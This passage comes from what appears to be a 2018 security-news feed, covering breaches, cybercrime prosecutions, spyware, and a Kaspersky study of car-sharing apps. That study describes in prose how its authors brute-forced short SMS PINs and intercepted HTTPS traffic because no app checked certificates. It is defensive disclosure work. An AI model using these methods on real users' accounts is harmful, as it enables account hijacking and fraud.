Wheeler pleaded guilty in March to a charge of conspiracy to commit access device fraud. Prosecutors said he worked with others to steal personal information — including passwords, email addresses and bank account numbers — to obtain money, goods and services.

U.S. District Judge Leigh May sentenced Wheeler, 25, to spend three years and 10 months in prison, followed by three years of supervised release. As part of a plea deal reached with prosecutors, Wheeler also agreed to forfeit $27,562 in cash found in his home and 13.97 bitcoins, which are currently worth a total of more than $100,000.

Wheeler apologized to the judge and told her he has worked hard since he was caught to get himself on the right path — getting a legitimate job, paying taxes and kicking a drug addiction.

"As I move forward, I hope to be able to do right by this country and the world," he said.

May said Wheeler's crime was extremely serious, but she imposed the relatively light sentence agreed to by the two sides in part because of the effort he'd made.

"You're doing what you need to do to show me you've learned from this," she said.

Known online as Trappy and Trappy_Pandora, Wheeler began working for AlphaBay in May 2015. His duties included moderating the AlphaBay forum on Reddit and posting information about AlphaBay in other Reddit forums, mediating sales disputes among the marketplace's users, providing nontechnical assistance to users and promoting AlphaBay online, prosecutors have said.

Wheeler's lawyer, Phillip Turner, described his client as a "very misguided young man who came from a situation where he lacked self-esteem and got on the wrong path." Having a title bestowed upon him by AlphaBay made him feel important and gave him a sense of belonging, Turner said in court.

Prosecutor Samir Kaushal told the judge Wheeler was completely aware he was involved in illegal activity and encouraged lawlessness in others. Given the scope of the illegal activity enabled by AlphaBay — including the sale of personal financial information and dangerous drugs — Wheeler could have been charged with much more serious crimes that would have carried a much heftier sentence.

"This is a very good outcome for him," Kaushal said.

The only reason prosecutors recommended a lower sentence is because when he was caught, he immediately admitted his guilt and began cooperating with the government, Kaushal said.

Wheeler was paid a salary in bitcoin, a digital currency, by Alexandre Cazes, the 25-year-old Canadian owner of AlphaBay who was known online as Alpha02 and Admin, according to a court filing.

AlphaBay used Tor, a network of thousands of computers run by volunteers, to hide its tracks. With Tor, traffic gets relayed through multiple computers, with identifying information stripped at each stop so no single computer knows the full chain.

The court filing says Wheeler's work with AlphaBay ended July 3, 2017. Two days later, Cazes was arrested in Thailand with DEA and FBI assistance, resulting in AlphaBay going offline. Cazes died in Thai police custody on July 12, 2017. The country's narcotics police chief told reporters at the time that Cazes hanged himself in jail just before a scheduled court hearing.

The police agency Europol estimates AlphaBay had done $1 billion in business since its 2014 creation. Cazes had amassed a $23 million fortune as the site's creator and administrator, according to court records.


Dixons Carphone Breach: Much Larger Than First Thought
2.8.2018 securityweek Incindent

A data breach at Dixons Carphone that was made public last month resulted in 10 million records being accessed by unknown actors, the consumer UK electronics retailer announced Tuesday.

The company initially said that only 1.2 million records containing personal data of its customers, such as name, address or email address, were accessed during the intrusion. They also claimed that the accessed data did not include financial information.

In an update released this week (PDF), the company revealed that hackers were able to access approximately 10 million records containing personal data. The incident happened last year, but no specific details on when or how the intrusion took place were provided.

Although it initially said that the attackers were attempting to access 5.9 million cards and that 105,000 non-EU issued payment cards were indeed compromised, the company now says that the impacted records did not contain payment card details.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated,” Dixons Carphone said.

The company also announced that it has decided to inform all of its customers of the data breach. The retailer claims that this is only a precaution and that it only apologizes to customers, while advising them of available protective steps they could take to minimize the risk of fraud.

“As we indicated previously, we have taken action to close off this access and have no evidence it is continuing,” the company said.


Yale University Discloses Decade-Old Data Breach
2.8.2018 securityweek Incindent

"Because the intrusion happened nearly ten years ago, we do not have much more information about how it occurred."

Yale University revealed that hackers accessed one of its databases between 2008 and 2009 and accessed the personal information of 119,000 people.

The intrusion happened between April 2008 and January 2009 and apparently affected a single database stored on a Yale server. The data breach was discovered on June 16, 2018, during a security review. The attackers extracted names, Social Security numbers, and, in almost all cases, dates of birth. In many cases, Yale email addresses were also extracted, and in some cases the physical addresses of individuals associated with the university were compromised as well.

According to Yale, no financial information was stored in the database and almost all people impacted by the breach were affiliated with the university.

“In 2011, Yale IT deleted the personal information in the database as part of an effort to eliminate unneeded personal information on Yale servers, but the intrusion was not detected at that time,” the university says.

Last week, Yale sent notices of the data breach to impacted members of the Yale community, including alumni/ae, faculty members, and staff members. The university says notices were sent to nearly 97% of the individuals affected, but that it has yet to acquire a verified current address for the remaining 3%.

In a letter (PDF) to the State of New Hampshire Attorney General, Yale also revealed that the same server was hacked a second time between March 2016 and June 2018. The intrusion resulted in the compromise of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale claims that there is no indication that the compromised information has been misused. However, it decided to offer identity monitoring services at no cost, to help users guard against identity theft.

Because the intrusion occurred a decade ago, there is no information on how the attackers hacked the server. Yale also says that “it is not feasible to determine the identities of the perpetrators.”


Trump Criticized for Not Leading Effort to Secure Elections
2.8.2018 securityweek BigBrothers

WASHINGTON (AP) — As alarms blare about Russian interference in U.S. elections, the Trump administration is facing criticism that it has no clear national strategy to protect the country during the upcoming midterms and beyond.

Both Republicans and Democrats have criticized the administration's response as fragmented, without enough coordination across federal agencies. And with the midterms just three months away, critics are calling on President Donald Trump to take a stronger stand on an issue critical to American democracy.

"There's clearly not enough leadership from the top. This is a moment to move," said Maryland Sen. Chris Van Hollen, head of the Democratic Senatorial Campaign Committee. "I don't think they are doing nearly enough."

Various government agencies have been at work to ensure safe voting. The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression.

But Trump himself rarely talks about the issue. And in the nearly two years since Russians were found to have hacked into U.S. election systems and manipulated social media to influence public opinion, the White House has held two meetings on election security.

One was last week. It ran 30 minutes.

The meeting resulted in no new presidential directive to coordinate the federal effort to secure the election, said Suzanne Spaulding, former undersecretary of homeland security who was responsible for cyber security and protecting critical infrastructure.

"Trump's failure to take a leadership role on this, up until this (National Security Council) meeting, misses an opportunity to send a clear message to states that this is a very serious threat," Spaulding said. "We did not get out of this NSC meeting a comprehensive, interagency strategy. It was each department and agency working in their silos."

Garrett Marquis, a spokesman for the NSC, said the government response is robust. He said NSC staff "leads the regular and continuous coordination of the whole-of-government approach to addressing foreign malign influence and ensuring election security."

At a cybersecurity summit on Tuesday, Vice President Mike Pence said he was confident officials could prevent further meddling by foreign agents.

"We will repel any efforts to interfere in our elections," he said.

Republican Sen. Lindsey Graham of South Carolina said government agencies are "doing a lot of good work, but nobody knows about it." He lamented Trump's contradictory statements about whether he accepts the U.S. intelligence assessment that Russia meddled in the 2016 presidential election.

"What I think he needs to do is lead this nation to make sure the 2018 election is protected," Graham said recently on CBS' "Face the Nation." ''He needs to be the leader of the movement — not brought to the dance reluctantly. So, I hope he will direct his government, working with Congress, to harden the 2018 election before it's too late."

The debate over safeguarding U.S. elections comes as evidence of cyber threats piles up. Facebook announced Tuesday that it has uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms.

The company said it removed 32 accounts from Facebook and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts.

Earlier this month, Microsoft said it discovered that a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said Monday that additional analysis has confirmed that the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., has said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017.

Sen. Jeanne Shaheen, D-N.H., who is not running for re-election, told The Associated Press on Monday that someone contacted her office "claiming to be an official from a country."

A frequent critic of Russia, Shaheen said she didn't know if Moscow was behind the email received in November but had turned the matter over to the FBI.

Shaheen said another senator had been targeted besides McCaskill. "It's my understanding that there is, but I don't want to speak for other senators," she said. When asked if it was a Democratic senator, Shaheen nodded yes.

"People on both sides of the aisle have been beating the drum for two years now about the need for somebody to be accountable for cybersecurity across the government," Shaheen said.

National Intelligence Director Dan Coats said U.S. intelligence officials continue to see activity from individuals affiliated with the Internet Research Agency, whose members were indicted by U.S. special counsel Robert Mueller. Coats said they create new social media accounts disguised as those of Americans, then use the fake accounts to drive attention to divisive issues in America.

In the Obama administration, synchronizing federal agencies' work on election security would have likely been the job of the White House cybersecurity coordinator. Trump's national security adviser, John Bolton, abolished the post in May to remove a layer of bureaucracy from the NSC flow chart.

Under the current structure, the point man for election security is Rear Adm. Douglas Fears. Trump tapped Fears in early June as his deputy assistant to the president and homeland security and counterterrorism adviser.

Fears oversees the election security and other portfolios of the NSC's Cybersecurity Directorate and coordinates the federal government's response to disasters.

Homeland Security Secretary Kirstjen Nielsen says cyber threats are "an urgent, evolving crisis."

"Our adversaries' capabilities online are outpacing our stove-piped defenses," Nielsen said Tuesday. "In fact, I believe that cyber threats collectively now exceed the danger of physical attacks against us. This is a major sea change for my department and for our country's security."


FireEye MalwareGuard Uses Machine Learning to Detect Malware
2.8.2018 securityweek
Virus

FireEye on Tuesday announced the launch of MalwareGuard, an engine that leverages machine learning (ML) to detect malware and prevent it from executing.

MalwareGuard has been added to FireEye’s Endpoint Security product and the firm will also be deploying the new engine to its Network Security and Email Security solutions.

The engine is designed to predict whether a Windows executable file is malicious, prior to its execution. MalwareGuard should be able to detect both known malware and zero-day threats, FireEye said.

MalwareGuard is based on two years of research conducted by the company, which included assembling a dataset of more than 300 million samples and using it to train the engine. During its internal evaluation, which involved testing in real-world incident response cases, FireEye made predictions on over 20 million executable files.

“During the internal evaluation period, we also developed the infrastructure to support long-term tracking and maintenance for MalwareGuard,” FireEye said in a blog post. “Our goal was and is to have real-time visibility into the model’s performance, with the expectation that model retraining could be done on demand when performance dips below a threshold. To meet this objective, we developed data pipelines for each phase of the ML process, which makes the system fully automatable.”

The company’s blog post includes details on the goals, development, and testing of MalwareGuard.

In addition to MalwareGuard, FireEye informed customers that its Endpoint Security solution now includes new features designed to provide improved management capabilities and enable organizations to rapidly respond to important alerts.

MalwareGuard and the other new features have been added to the latest version of FireEye Endpoint Security, specifically version 4.5.


Leaked Chats Show Alleged Russian Spy Seeking Hacking Tools
2.8.2018 securityweek BigBrothers

MOSCOW (AP) — Six years ago, a Russian-speaking cybersecurity researcher received an unsolicited email from Kate S. Milton.

Milton claimed to work for the Moscow-based anti-virus firm Kaspersky. In an exchange that began in halting English and quickly switched to Russian, Milton said she was impressed by the researcher's work on exploits — the digital lock picks used by hackers to break into vulnerable systems — and wanted to be copied in on any new ones that the researcher came across.

"You almost always have all the top-end exploits," Milton said, after complimenting the researcher about a post to her website, where she often dissected malicious software.

"So that our contact isn't one-sided, I'd offer you my help analyzing malicious viruses, and as I get new samples I'll share," Milton continued. "What do you think?"

The researcher — who works as a security engineer and runs the malware-sharing site on the side — always had a pretty good idea that Milton wasn't who she said she was. Last month, she got confirmation via an FBI indictment.

The indictment, made public on July 13, lifted the lid on the Russian hacking operation that targeted the 2016 U.S. presidential election. It identified "Kate S. Milton" as an alias for military intelligence officer Ivan Yermakov, one of 12 Russian spies accused of breaking into the Democratic National Committee and publishing its emails in an attempt to influence the 2016 election.

The researcher, who gave her exchanges with Milton to The Associated Press on condition of anonymity, said she wasn't pleased to learn she had been corresponding with an alleged Russian spy. But she wasn't particularly surprised either.

"This area of research is a magnet for suspicious people," she said.

The researcher and Milton engaged in a handful of conversations between April 2011 and March 2012. But even their sparse exchanges, along with a few digital breadcrumbs left behind by Yermakov and his colleagues, offer insight into the men behind the keyboards at Russia's Main Intelligence Directorate, or GRU.

It isn't unusual for messages like Milton's to come in out of the blue, especially in the relatively small world of independent malware analysts.

"There was nothing particularly unusual in her approach," the researcher said. "I had very similar interactions with amateur and professional researchers from different countries."

The pair corresponded for a while. Milton shared a piece of malicious code at one point and sent over a hacking-related YouTube video at another, but contact fizzled out after a few months.

Then, the following year, Milton got back in touch.

"It's been all work, work, work," Milton said by way of apology, before quickly getting to the point. She needed new lock picks.

"I know that you can help," she wrote. "I'm working on a new project and I really need contacts that can provide information or have contacts with people who have new exploits. I am willing to pay for them."

In particular, Milton said she wanted information on a recently disclosed vulnerability codenamed CVE-2012-0002 - a critical Microsoft flaw that could allow hackers to remotely compromise some Windows computers. Milton had heard that someone had already cobbled together a working exploit.

"I'd like to get it," she said.

The researcher demurred. The trade in exploits — for use by spies, cops, surveillance companies or criminals — can be a seedy one.

"I usually steer clear from any wannabe buyers and sellers," she told the AP.

She politely declined - and never heard from Milton again.

Milton's Twitter account — whose profile photo features "Lost" star Evangeline Lilly — is long dormant. The last few messages carry urgent, awkwardly worded appeals for exploits or tips about vulnerabilities.

"Help me find detailed description CVE-2011-0978," one message reads, referring to a bug in PHP, a coding language often used for websites. "Need a work exploit," the message continues, ending with a smiley face.

It isn't clear whether Yermakov was working for the GRU when he first masqueraded as Kate S. Milton. Milton's Twitter silence — starting in 2011 — and the reference to a "new project" in 2012 might hint at a new job.

In any case, Yermakov wasn't working for the anti-virus firm Kaspersky — not then and not ever, the company said in a statement.

"We don't know why he allegedly presented himself as an employee," the statement said.

Messages sent by the AP to Kate S. Milton's Gmail account were not returned.

The exchanges between Milton (Yermakov) and the researcher could be read in different ways.

They might show that the GRU was trying to cultivate people in the information security community with an eye toward getting the latest exploits as soon as possible, said Cosimo Mortola, a threat intelligence analyst at the cybersecurity company FireEye.

It's also possible that Yermakov might have initially worked as an independent hacker, hustling for spy tools before being hired by Russian military intelligence — a theory that makes sense to defense and foreign policy analyst Pavel Felgenhauer.

"For cyber, you have to hire boys that understand computers and everything the old spies at the GRU don't understand," Felgenhauer said. "You find a good hacker, you recruit him and give him some training and a rank — a lieutenant or something — and then he will do the same stuff."

The leak of Milton's conversations shows how the glare of publicity is revealing elements of the hackers' methods — and perhaps even hints about their private lives.

It's possible, for example, that Yermakov and many of his colleagues commute to work through the arched entrance to Komsomolsky 22, a military base in the heart of Moscow that serves as home to the alleged hacker's Unit 26165. Photos shot from inside show it's a well-kept facility, with a czarist-era facade, manicured lawns, flower beds and shady trees in a central courtyard.

The AP and others have tried to trace the men's digital lives, finding references to some of those indicted by the FBI in academic papers on computing and mathematics, on Russian cybersecurity conference attendee lists or — in the case of Cpt. Nikolay Kozachek, nicknamed "kazak" — written into the malicious code created by Fancy Bear, the nickname long applied to the hacking squad before their identities were allegedly revealed by the FBI.

One of Kozachek's other nicknames also appears on a website that allowed users to mine tokens for new weapons to use in the first-person shooter videogame "Counter Strike: Global Offensive" — providing a flavor of the hackers' extracurricular interests.

The AP has also uncovered several social media profiles tied to another of Yermakov's indicted colleagues — Lt. Aleksey Lukashev, allegedly the man behind the successful phishing of the email account belonging to Hillary Clinton's campaign chairman, John Podesta.

Lukashev operated a Twitter account under the alias "Den Katenberg," according to an analysis of the indictment as well as data supplied by the cybersecurity firm Secureworks and Twitter's "Find My Friends" feature.

A tipster using the Russian facial recognition search engine FindFace recently pointed the AP to a VKontatke account that, while using a different name, appears active and features photos of the same young, Slavic-looking man.

Many of his posts and his friends appear to originate from a district outside Moscow known as Voskresensky. The photos show him cross-country skiing at night, wading in emerald waters somewhere warm and visiting Yaroslavl, an ancient city northwest of Moscow. One video appeared to show Russia's 2017 Spasskaya Tower Festival, a military music festival popular with officers.

The AP could not establish with certainty that the man on the VKontatke account is Lukashev. Several people listed as friends either declined to comment when approached by the AP or said Lukashev's name was unknown to them.

Shortly thereafter, the profile's owner locked down his account, making his vacation snaps invisible to outsiders.

The exchanges between the cybersecurity researcher and Kate S. Milton are available here.


The Disconnect Between Understanding Email Threats and Preventing Them
2.8.2018 securityweek
Spam

Email continues to be the starting point for the majority of all security breaches. The 2018 Verizon Data Breaches Investigation Report (DBIR) says that email is the attack vector in 96% of breaches. But a new study suggests that despite these figures, companies are not allocating sufficient resources to reduce email risk.

The study (PDF) was conducted the Ponemon Institute for Valimail, an email security automation firm. Ponemon surveyed 650 IT and IT security professionals who have a role in securing email applications and/or protecting end-users from email threats. It found, according to Ponemon, a "disconnect between concerns about email threats and fraud and the lack of action taken by companies represented in this study."

Findings suggest that 80% of respondents are very concerned about their ability to counter the email threat, but only 29% are taking significant steps to counter the threat. The greatest concerns are that hackers might spoof their email domain "to hurt the deliverability of legitimate emails" (82%); the overall state of their current email security (80%); and that they could be hacked or infiltrated via a phishing email (69%).

The threat from email phishing, spoofing and impersonation attacks is understood and acknowledged. Seventy-four percent of respondents are concerned about phishing emails directed at employees or executives; 67% about email as a source of fraud against the company (such as BEC attacks); 66% about email as a vector for infiltrating malware and/or exfiltrating data; and 65% about hackers impersonating the company in phishing attacks against others -- that is, other firms and non-employees.

The disconnect comes from the company response to the concerns held by their own professionals. Only 29% of the respondents believe their firm is taking significant steps to prevent phishing attacks and email impersonation, while 21% say they are taking 'no steps' -- despite the DBIR's evidence that email is the source of almost all data breaches.

Only 41% of the respondents say their organization has created a security infrastructure or plan for email -- but of these, almost half say there is no schedule for reviewing its effectiveness (39%), or are unsure of any review schedule (10%). Only 11% of respondents said their organization reviews the effectiveness of its email security plan quarterly.

Part of the problem may be down to the traditional relationship between OT and IT. While email is firmly a part of information technology rather than operational technology, nevertheless it has an operational business function. As such, operational ease and continuity might be receiving a higher priority than security. This is possibly supported by managerial responsibility.

Asked, 'Who within the organization is primarily responsible for the security of email and services/applications that use email?', only 15% of the respondents said it was the CISO/CSO. Twenty-one percent said it was the CIO/CTO, 20% said the line of business management, 9% said the head of messaging services, and 9% said the head of IT Operations. Somewhat surprisingly, the majority of organizations do not have their head of security responsible for the security of emails.

Impersonation attacks are an acknowledged and growing email threat. The top five currently-used technologies to prevent these are anti-spam/phishing filters (63%), secure email gateways (53%), SIEMs (44%), DMARC (39%), and anti-phish training (30%). Use of all of these is expected to grow over the next 12 months: filters by 2%, SEGs by 10%, SIEMs by 3%, DMARC by 9%, and phish training by a colossal 27%.

These figures simply indicate that use of existing technologies that have currently failed to prevent the email start-point in 96% or all security breaches will be increased. This doesn't mean, however, that the respondents have abandoned hope in their ability to improve things. Asked what effect a 20% increase in their email security budget would have, the reply was a 45% improvement in the detection rate with a 33% improvement in the prevention rate.

"With the dramatic rise in impersonation attacks as a primary vector for cyberattacks, companies are re-assessing the balance of their security efforts,” said Alexander García-Tobar, CEO and co-founder of Valimail.

“While traditional approaches are good for filtering malicious content and blocking spam, impersonation attacks can only be stopped with email anti-impersonation solutions. Individuals at all levels of a company, including customers and clients, are vulnerable to phishing, fraud, and impersonation attacks. Companies can strengthen their security against email fraud with automated solutions and close that disconnect between email threats and preventive action," he added

What surprises Ponemon, however, is the current lack of adoption of such automated solutions. "We were surprised to see a vast majority of companies who believe that they have had a breach involving email but are not yet embracing automated anti-impersonation solutions to protect themselves proactively,” said Dr. Larry Ponemon, chairman and founder of Ponemon Institute. “Adopting fully automated solutions for DMARC enforcement that provide email authentication will help companies get ahead of the attackers and build trust with their clients and end users."


Human Rights Group: Employee Targeted With Israeli Spyware
2.8.2018 securityweek
Virus

LONDON (AP) — An Amnesty International employee has been targeted with Israeli-made surveillance software, the human rights group said Wednesday, adding to a growing number of examples of Israeli technology being used to spy on human rights workers and opposition figures in the Middle East and beyond.

In a 20-page report, Amnesty outlined how it thinks a hacker tried to break into an unidentified staff member's smartphone in early June by baiting the employee with a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

The London-based human rights organization said it traced the malicious link in the message to a network of sites tied to the NSO Group, an Israeli surveillance company implicated in a series of digital break-in attempts, including a campaign to compromise proponents of a soda tax in Mexico and an effort to hack into the phone of an Arab dissident that prompted an update to Apple's operating system.

Joshua Franco, Amnesty's head of technology and human rights, said the latest hacking attempt was emblematic of the increased digital risk faced by activists worldwide.

"This is the new normal for human rights defenders," Franco said.

NSO said in a written statement that its product was "intended to be used exclusively for the investigation and prevention of crime and terrorism" and that allegations of wrongdoing would be investigated. In response to a series of written questions, the company said past allegations of customer misuse had, in an undisclosed number of cases, led to the termination of contracts.

Amnesty's findings were corroborated by internet watchdog Citizen Lab, which has been tracking NSO spyware for two years and is based at the University of Toronto's Munk School of Global Affairs.

In its own report being released Wednesday, Citizen Lab said it so far had counted some 175 targets of NSO spyware worldwide, including 150 people in Panama identified as part of a massive domestic espionage scandal swirling around the country's former president.

The Amnesty International report said the organization identified a second human rights activist, in Saudi Arabia, who was targeted in a similar way to its staffer. Citizen Lab said it found traces of similar hacking attempts tied to Qatar or Saudi, hinting at the use of the Israeli spyware elsewhere in the Gulf.

Any possible use of Israeli technology to police dissent in the Arab world could raise uncomfortable questions both for Israel, which still sees itself as a bastion of democracy in the region, and for countries with no formal diplomatic ties to the Jewish state.

For Amnesty's Franco, it was a sign of an out-of-control trade in high-tech surveillance tools.

"This is a huge market that's completely opaque and under-regulated," he said.


Three Ukrainians Arrested for Hacking Over 100 US Companies
2.8.2018 securityweek Crime

Three Ukrainians have been arrested for hacking more than 100 US companies and stealing millions of customer records, the Department of Justice announced Wednesday.

Dmytro Fedorov, 44, Fedir Hladyr, 33, and Andrii Kopakov, 30, were members of a "sophisticated international cybercrime group" called "FIN7," the department said in a statement.

"Since at least 2015, FIN7 members engaged in a highly sophisticated malware campaign targeting more than 100 US companies, predominantly in the restaurant, gaming, and hospitality industries," it said.

"FIN7 hacked into thousands of computer systems and stole millions of customer credit and debit card numbers, which the group used or sold for profit," it said.

The Justice Department said members of the "prolific hacking group" also targeted computer networks in Britain, Australia, and France.

FBI special agent Jay Tabb told a press conference in Seattle, Washington, where the arrests were announced, that the hacking was not state-sponsored.

"No linkage at all to any state-sponsored activity," Tabb said. "This is just old-fashioned organized crime."

Fedorov, a "high-level hacker and manager," was arrested in Bielsko-Biala, Poland, in January and is being detained pending extradition to the United States, the Department of Justice said.

Hladyr, FIN7's systems administrator, was arrested in Dresden, Germany, in January, it said, and is being held in Seattle, Washington, pending a trial scheduled to open on October 22.

Kolpakov, described as a "supervisor of a group of hackers," was arrested in Lepe, Spain, in late June and is being detained there pending a US extradition request, the department said.

- Chipotle, Arby's targeted -

"Cyber criminals who believe that they can hide in faraway countries and operate from behind keyboards without getting caught are just plain wrong," said Annette Hayes, US Attorney for the Western District of Washington.

The charges against the three were contained in federal indictments unsealed on Wednesday.

They were charged with 26 counts of conspiracy, wire fraud, computer hacking, access device fraud, and aggravated identity theft.

The Justice Department said that FIN7 also known as the "Carbanak Group" and the "Navigator Group," breached computer networks of companies in 47 US states and Washington DC.

They allegedly stole "more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations."

Among the companies which have publicly disclosed hacks by FIN7 are Chipotle Mexican Grill, Chili's, Arby's, Red Robin and Jason's Deli, the Justice Department said.

Many of the businesses were targeted through phishing schemes involving email.

"FIN7 carefully crafted email messages that would appear legitimate to a business' employee, and accompanied emails with telephone calls intended to further legitimize the email," it said.

Once an attached file was opened, it would trigger malware to steal payment card data which was sold on online underground marketplaces.


A study of car sharing apps
2.8.2018 Kaspersky  Mobil

The growing popularity of car sharing services has led some experts to predict an end to private car ownership in big cities. The statistics appear to back up this claim: for example, in 2017 Moscow saw the car sharing fleet, the number of active users and the number of trips they made almost double. This is great news, but information security specialists have started raising some pertinent questions: how are the users of these services protected and what potential risks do they face in the event of unauthorized access to their accounts?

Why is car sharing of interest to criminals?
The simple answer would be because they want to drive a nice car at somebody else’s expense. However, doing so more than once is likely to be problematic – once the account’s owner finds out they have been charged for a car they never rented, they’ll most likely contact the service’s support line, the service provider will check the trip details, and may eventually end up reporting the matter to the police. It means anyone trying it a second time will be tracked and caught red-handed. This is obvious and makes this particular scenario the least likely reason for hijacking somebody’s account.

The selling of hijacked accounts appears to be a more viable reason. There is bound to be demand from those who don’t have a driving license or those who were refused registration by the car sharing service’s security team. Indeed, offers of this nature already exist on the market.

Criminals offer hijacked accounts from a wide range of car sharing services…

…and explain why you are better off using somebody else’s account

In addition, someone who knows the details of a user’s car sharing account can track all their trips and steal things that are left behind in the car. And, of course, a car that is fraudulently rented in somebody else’s name can always be driven to some remote place and cannibalized for spare parts.

Application security
So, we know there is potential interest among criminal elements; now let’s see if the developers of car sharing apps have reacted to it. Have they thought about user security and protected their software from unauthorized access? We tested 13 mobile apps and (spoiler alert!) the results were not very encouraging.

We started by checking the apps’ ability to prevent launches on Android devices with root privileges, and assessed how well the apps’ code is obfuscated. This was done for two reasons:

the vast majority of Android applications can be decompiled, their code modified (e.g. so that user credentials are sent to a C&C), then re-assembled, signed with a new certificate and uploaded again to an app store;
an attacker on a rooted device can infiltrate the process of the necessary application and gain access to authentication data.
Another important security element is the ability to choose a username and password when using a service. Many services use a person’s phone number as their username. This is quite easy for cybercriminals to obtain as users often forget to hide it on social media, while car sharing users can be identified on social media by their hashtags and photos.

An example of how a social media post can give you away

We then looked at how the apps work with certificates and if cybercriminals have any chance of launching successful MITM attacks. We also checked how easy it is to overlay an application’s interface with a fake authorization window.

Reverse engineering and superuser privileges
Of all the applications we analyzed, only one was capable of countering reverse engineering. It was protected with the help of DexGuard, a solution whose developers also promise that protected software will not launch on a device where the owner has gained root privileges or that has been modified (patched).

File names in the installation package indicate the use of DexGuard

However, while that application is well protected against reverse engineering, there’s nothing to stop it from launching on an Android device with superuser privileges. When tested that way, the app launches successfully and goes through the server authorization process. An attacker could obtain the data located in protected storage. However, in this particular app the data was encrypted quite reliably.

Example of user’s encrypted credentials

Password strength
Half the applications we tested do not allow the user to create their own credentials; instead they force the user to use their phone number and a PIN code sent in a text message. On the one hand, this means the user can’t set a weak password like ‘1234’; on the other hand, it presents an opportunity for an attacker to obtain the password (by intercepting it using the SS7 vulnerability, or by getting the phone’s SIM card reissued). We decided to use our own accounts to see how easy it is to find out the ‘password’.

If an attacker finds a person’s phone number on social media and tries to use it to log in to the app, the owner will receive an SMS with a validation code:

As we can see, the validation code is just four digits long, which means it only takes 10,000 attempts to guess it – not such a large number. Ideally, such codes should be at least six digits long and contain upper and lower case characters as well as numbers.

Another car sharing service sends stronger passwords to users; however, there is a drawback to that as well. Its codes are created following a single template: they always have numbers in first and last place and four lower-case Latin characters in the middle:

That means there are 45 million possible combinations to search through; if the positioning of the numbers were not restricted, the number of combinations would rise to two billion. Of course, 45,000,000 is also large amount, but the app doesn’t have a timeout for entering the next combination, so there are no obstacles to prevent brute forcing.

Now, let’s return to the PIN codes of the first application. The app gives users a minute to enter the PIN; if that isn’t enough time, users have to request a new code. It turned out that the combination lifetime is a little over two minutes. We wrote a small brute force utility, reproduced part of the app/server communication protocol and started the brute force. We have to admit that we were unable to brute force the code, and there are two possible reasons for that. Firstly, our internet line may have been inadequate, or secondly, the car sharing operator set an appropriate two-minute timeout for the PIN code, so it couldn’t be brute forced within two minutes even with an excellent internet connection. We decided not to continue, confirming only that the service remained responsive and an attack could be continued after several attempts at sending 10,000 requests at a time.

While doing so, we deliberately started the brute force in a single thread from a single IP address, thereby giving the service a chance to detect and block the attack, contact the potential victim and, as a last resort, deactivate the account. But none of these things happened. We decided to leave it at that and moved on to testing the next application.

We tried all the above procedures on the second app, with the sole exception that we didn’t register a successful brute force of the password. We decided that if the server allows 1,000 combinations to be checked, it would probably also allow 45 million combinations to be checked, so it is just a matter of time.

The server continues to respond after 1,000 attempts to brute force the password

This is a long process with a predictable result. This application also stores the username and password locally in an encrypted format, but if the attacker knows their format, brute forcing will only take a couple of minutes – most of this time will be spent on generating the password/MD5 hash pair (the password is hashed with MD5 and written in a file on the device).

MITM attack
It’s worth noting that the applications use HTTPS to communicate data to and from their control centers, so it may take quite a while to figure out the communication protocol. To make our ‘attack’ faster, we resorted to an MITM attack, aided by another global security flaw: none of the tested applications checks the server’s certificate. We were able to obtain the dump of the entire session.

Screenshot of a successful MITM attack. HTTPS traffic dump was obtained

Protection from overlaying
Of course, it’s much faster and more effective (from the attacker’s point of view) if an Android device can be infected, i.e., the authorization SMS can be intercepted, so the attacker can instantly log in on another device. If there’s a complex password, then the attacker can hijack the app’s launch by showing a fake window with entry fields for login details that covers the genuine app’s interface. None of the applications we analyzed could counter this sort of activity. If the operating system version is old enough, privileges can be escalated and, in some cases, the required data can be extracted.

Outcome
The situation is very similar to what we found surrounding Connected Car applications. It appears that app developers don’t fully understand the current threats to mobile platforms – that goes for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying users of suspicious activities – only one service currently sends notifications to users about attempts to log in to their account from a different device. The majority of the applications we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code.

Russian car sharing operators could learn a thing or two from their colleagues in other countries. For example, a major player in the market of short-term car rental only allows clients to access a car with a special card – this may make the service less convenient, but dramatically improves security.

Advice for users
Don’t make your phone number publicly available (the same goes for your email address)
Use a separate bank card for online payments, including car sharing (a virtual card also works) and don’t put more money on it than you need.
If your car sharing service sends you an SMS with a PIN code for your account, contact the security service and disconnect your bank card from that account.
Do not use rooted devices.
Use a security solution that will protect you from cybercriminals who steal SMSs. This will make life harder not only for free riders but also for those interested in intercepting SMSs from your bank.
Recommendations to car sharing services
Use commercially available packers and obfuscators to complicate reverse engineering. Pay special attention to integrity control, so the app can’t be modified.
Use mechanisms to detect operations on rooted devices.
Allow the user to create their own credentials; ensure all passwords are strong.
Notify users about successful logons from other devices.
Switch to PUSH notifications: it’s still rare for malware to monitor the Notification bar in Android.
Protect your application interface from being overlaid by another app.
Add a server certificate check.


DDoS attacks in Q2 2018
2.8.2018 Kaspersky  Attack

CONTENTS
News overview
Q2 2018 news includes: non-standard use of old vulnerabilities, new botnets, the cutthroat world of cryptocurrencies, a high-profile DDoS attack (or not) with a political subtext, the slashdot effect, some half-baked attempts at activism, and a handful arrests. But first things first.

